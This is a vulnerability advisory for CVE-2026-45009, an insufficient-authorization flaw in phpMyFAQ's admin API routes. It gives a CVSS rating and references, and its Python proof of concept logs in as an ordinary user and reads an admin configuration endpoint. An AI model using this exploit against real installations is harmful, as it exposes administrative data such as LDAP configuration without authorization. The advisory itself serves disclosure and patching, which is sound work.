Security Vulnerability Report
CVE-2026-45009 CVSS 4.3 MEDIUM

Published: 2026-05-15 19:17:01
Last Modified: 2026-05-15 21:16:37

Description

phpMyFAQ before 4.1.2 contains an insufficient authorization vulnerability in admin-api routes that allows authenticated ordinary users to access administrative endpoints by only checking login status instead of verifying backend privileges. Attackers with valid frontend user accounts can access sensitive backend operational information including dashboard versions, LDAP configuration, Elasticsearch statistics, and health-check data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

phpMyFAQ < 4.1.2 (no CPE configuration data available for this entry yet)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_poc(target_url, username, password):
    """
    Proof of Concept for CVE-2026-45009
    Demonstrates access to admin API endpoints as a regular user.
    """
    session = requests.Session()

    # 1. Login as a normal user
    login_endpoint = f"{target_url}/index.php"
    login_payload = {
        "faqusername": username,
        "faqpassword": password
    }

    try:
        print("[+] Attempting to login as normal user...")
        response = session.post(login_endpoint, data=login_payload)
        if response.status_code != 200:
            print("[-] Login failed")
            return

        # 2. Access sensitive Admin API endpoint (e.g., configuration)
        # This endpoint typically requires admin privileges
        api_endpoint = f"{target_url}/admin/api/configuration"
        print(f"[+] Accessing protected endpoint: {api_endpoint}")
        api_response = session.get(api_endpoint)

        if api_response.status_code == 200:
            print("[+] Vulnerability confirmed! Sensitive data leaked:")
            print(api_response.text)
        else:
            print(f"[-] Access denied. Status code: {api_response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {str(e)}")


if __name__ == "__main__":
    # Replace with actual target and credentials
    target = "http://localhost/phpmyfaq"
    user = "user"
    pwd = "password"
    check_poc(target, user, pwd)

Weakness

CWE-863 (Incorrect Authorization)

References

https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-jrc5-w569-h7h5
https://www.vulncheck.com/advisories/phpmyfaq-insufficient-authorization-check-in-admin-api-endpoints